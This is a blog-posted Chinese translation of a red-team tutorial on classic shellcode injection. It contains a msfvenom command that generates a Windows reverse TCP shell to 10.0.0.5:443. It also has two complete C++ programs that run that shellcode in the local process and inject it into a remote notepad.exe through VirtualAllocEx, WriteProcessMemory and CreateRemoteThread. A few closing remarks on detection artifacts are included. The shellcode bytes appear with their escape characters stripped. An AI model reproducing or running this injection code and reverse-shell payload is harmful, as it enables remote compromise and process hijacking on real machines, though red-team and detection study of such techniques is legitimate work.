【翻譯】創建線程shellcode注入

2019 年 10 月 6 日
筆記

本文作者：Ovpirit_Three（Ms08067紅隊小組成員）

注入shellcode進入一個本地進程

這次實現探索了將shellcode注入進程內存並執行它的一些經典方法

一、執行shellcode在本地進程

一個簡單的關於如何直接執行一個c++程序的shellcode的測試

為逆向的shell生成shell代碼:

命令如下：

msfvenom -p windows/x64/shell_reverse_tcpLHOST=10.0.0.5LPORT=443-f c -b x00x0ax0d

c++代碼注入和調用shellcode:

inject-local-process.cpp  #include"stdafx.h"  #include"Windows.h"  intmain()  {  Unsignedchar shellcode[]=  "x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"  "xffxffx48xbbx1dxbexa2x7bx2bx90xe1xecx48x31x58"  "x27x48x2dxf8xffxffxffxe2xf4xe1xf6x21x9fxdbx78"  "x21xecx1dxbexe3x2ax6axc0xb3xbdx4bxf6x93xa9x4e"  "xd8x6axbex7dxf6x29x29x33xd8x6axbex3dxf6x29x09"  "x7bxd8xeex5bx57xf4xefx4axe2xd8xd0x2cxb1x82xc3"  "x07x29xbcxc1xadxdcx77xafx3ax2ax51x03x01x4fxff"  "xf3x33xa0xc2xc1x67x5fx82xeax7axfbx1bx61x64x1d"  "xbexa2x33xaex50x95x8bx55xbfx72x2bxa0xd8xf9xa8"  "x96xfex82x32x2ax40x02xbax55x41x6bx3axa0xa4x69"  "xa4x1cx68xefx4axe2xd8xd0x2cxb1xffx63xb2x26xd1"  "xe0x2dx25x5exd7x8ax67x93xadxc8x15xfbx9bxaax5e"  "x48xb9xa8x96xfex86x32x2ax40x87xadx96xb2xeax3f"  "xa0xd0xfdxa5x1cx6exe3xf0x2fx18xa9xedxcdxffxfa"  "x3ax73xcexb8xb6x5cxe6xe3x22x6axcaxa9x6fxf1x9e"  "xe3x29xd4x70xb9xadx44xe4xeaxf0x39x79xb6x13xe2"  "x41xffx32x95xe7x92xdex42x8dx90x7bx2bxd1xb7xa5"  "x94x58xeaxfaxc7x30xe0xecx1dxf7x2bx9ex62x2cxe3"  "xecx1cx05xa8x7bx2bx95xa0xb8x54x37x46x37xa2x61"  "xa0x56x51xc9x84x7cxd4x45xadx65xf7xd6xa3x7ax2b"  "x90xb8xadxa7x97x22x10x2bx6fx34xbcx4dxf3x93xb2"  "x66xa1x21xa4xe2x7exeaxf2xe9xd8x1ex2cx55x37x63"  "x3ax91x7axeex33xfdx41x77x33xa2x57x8bxfcx5cxe6"  "xeexf2xc9xd8x68x15x5cx04x3bxdex5fxf1x1ex39x55"  "x3fx66x3bx29x90xe1xa5xa5xddxcfx1fx2bx90xe1xec"  "x1dxffxf2x3ax7bxd8x68x0ex4axe9xf5x36x1ax50x8b"  "xe1x44xffxf2x99xd7xf6x26xa8x39xeaxa3x7ax63x1d"  "xa5xc8x05x78xa2x13x63x19x07xbax4dxffxf2x3ax7b"  "xd1xb1xa5xe2x7exe3x2bx62x6fx29xa1x94x7fxeexf2"  "xeaxd1x5bx95xd1x81x24x84xfexd8xd0x3ex55x41x68"  "xf0x25xd1x5bxe4x9axa3xc2x84xfex2bx11x59xbfxe8"  "xe3xc1x8dx05x5cx71xe2x6bxeaxf8xefxb8xddxeax61"  "xb4x22x80xcbxe5xe4x57x5axadxd0x14x41x90xb8xad"  "x94x64x5dxaex2bx90xe1xec";  void*exec =VirtualAlloc(0,sizeofshellcode,MEM_COMMIT,PAGE_EXECUTE_READWRITE);  memcpy(exec,shellcode,sizeofshellcode);  ((void(*)())exec)();  return0;  }

在編譯之前，出於好奇，讓我們看看在反彙編器中生成的shellcode二進制代碼，這樣我們就可以大致了解我們的c++代碼是如何翻譯成x64的機器碼的:

同樣出於好奇，想要去觀察這個被注入的shellcode在被注入的進程中是什麼樣子的並且他的實際位置在哪裡。生成一個32bit的shellcode的二進制代碼（msfvenom -p windows/shell_reverse_tcpLHOST=10.0.0.5 LPORT=443 -f c -b x00x0ax0d），這個二進制代碼是被很好的定位在主線程的棧中

返回到x64位shellcode中-編譯並且執行這個二進制代碼，它給了我們預期的反向shell

二、在遠程進程中執行shellcode

下面的代碼將會把shellcode注入到PID為5428的notepad.exe的進程中，他將會初始化一個反向的shell返回到攻擊者處

inject-remote-process.cpp

#include"stdafx.h"  #include"Windows.h"  intmain(intargc,char*argv[])  {  unsignedcharshellcode[]=  "x48x31xc9x48x81xe9xc6xffxffxffx48x8dx05xefxff"  "xffxffx48xbbx1dxbexa2x7bx2bx90xe1xecx48x31x58"  "x27x48x2dxf8xffxffxffxe2xf4xe1xf6x21x9fxdbx78"  "x21xecx1dxbexe3x2ax6axc0xb3xbdx4bxf6x93xa9x4e"  "xd8x6axbex7dxf6x29x29x33xd8x6axbex3dxf6x29x09"  "x7bxd8xeex5bx57xf4xefx4axe2xd8xd0x2cxb1x82xc3"  "x07x29xbcxc1xadxdcx77xafx3ax2ax51x03x01x4fxff"  "xf3x33xa0xc2xc1x67x5fx82xeax7axfbx1bx61x64x1d"  "xbexa2x33xaex50x95x8bx55xbfx72x2bxa0xd8xf9xa8"  "x96xfex82x32x2ax40x02xbax55x41x6bx3axa0xa4x69"  "xa4x1cx68xefx4axe2xd8xd0x2cxb1xffx63xb2x26xd1"  "xe0x2dx25x5exd7x8ax67x93xadxc8x15xfbx9bxaax5e"  "x48xb9xa8x96xfex86x32x2ax40x87xadx96xb2xeax3f"  "xa0xd0xfdxa5x1cx6exe3xf0x2fx18xa9xedxcdxffxfa"  "x3ax73xcexb8xb6x5cxe6xe3x22x6axcaxa9x6fxf1x9e"  "xe3x29xd4x70xb9xadx44xe4xeaxf0x39x79xb6x13xe2"  "x41xffx32x95xe7x92xdex42x8dx90x7bx2bxd1xb7xa5"  "x94x58xeaxfaxc7x30xe0xecx1dxf7x2bx9ex62x2cxe3"  "xecx1cx05xa8x7bx2bx95xa0xb8x54x37x46x37xa2x61"  "xa0x56x51xc9x84x7cxd4x45xadx65xf7xd6xa3x7ax2b"  "x90xb8xadxa7x97x22x10x2bx6fx34xbcx4dxf3x93xb2"  "x66xa1x21xa4xe2x7exeaxf2xe9xd8x1ex2cx55x37x63"  "x3ax91x7axeex33xfdx41x77x33xa2x57x8bxfcx5cxe6"  "xeexf2xc9xd8x68x15x5cx04x3bxdex5fxf1x1ex39x55"  "x3fx66x3bx29x90xe1xa5xa5xddxcfx1fx2bx90xe1xec"  "x1dxffxf2x3ax7bxd8x68x0ex4axe9xf5x36x1ax50x8b"  "xe1x44xffxf2x99xd7xf6x26xa8x39xeaxa3x7ax63x1d"  "xa5xc8x05x78xa2x13x63x19x07xbax4dxffxf2x3ax7b"  "xd1xb1xa5xe2x7exe3x2bx62x6fx29xa1x94x7fxeexf2"  "xeaxd1x5bx95xd1x81x24x84xfexd8xd0x3ex55x41x68"  "xf0x25xd1x5bxe4x9axa3xc2x84xfex2bx11x59xbfxe8"  "xe3xc1x8dx05x5cx71xe2x6bxeaxf8xefxb8xddxeax61"  "xb4x22x80xcbxe5xe4x57x5axadxd0x14x41x90xb8xad"  "x94x64x5dxaex2bx90xe1xec";  HANDLE processHandle;  HANDLE remoteThread;  PVOID remoteBuffer;  printf("Injectingto PID: %i",atoi(argv[1]));  processHandle =OpenProcess(PROCESS_ALL_ACCESS,FALSE,DWORD(atoi(argv[1])));  remoteBuffer =VirtualAllocEx(processHandle,NULL,sizeofshellcode,(MEM_RESERVE |MEM_COMMIT),PAGE_EXECUTE_READWRITE);  WriteProcessMemory(processHandle,remoteBuffer,shellcode,sizeofshellcode,NULL);  remoteThread =CreateRemoteThread(processHandle,NULL,0,(LPTHREAD_START_ROUTINE)remoteBuffer,NULL,0,NULL);  CloseHandle(processHandle);  return0;  }

在展示shellcode注入notepad之前，它並沒有任何TCP連接

現在：一旦代碼編譯並執行，監視API調用的系統就會發現notepad正在做一些它本不應該做的事情——生成cmd.exe並啟動TCP連接:

在ProcExplorer中檢查記事本再次顯示了一個已建立的TCP連接，帶着cmd.exe作為子進程建立的

注意，notepad加載了一個ws2_32.dll模塊，在正常情況下，這個模塊不應該發生，因為該模塊負責socket管理

【翻譯】創建線程shellcode注入

VirMach 便宜 VPS

QNews

【翻譯】創建線程shellcode注入

分享此文：

Related Posts

哪些行業適合開發微信小程序

【面試普通人VS高手系列】Spring Boot的約定優於配置，你的理解是什麼？

Kubernetes(2:概念)

Kubernetes(1)

VirMach 便宜 VPS

QNews

熱門搜尋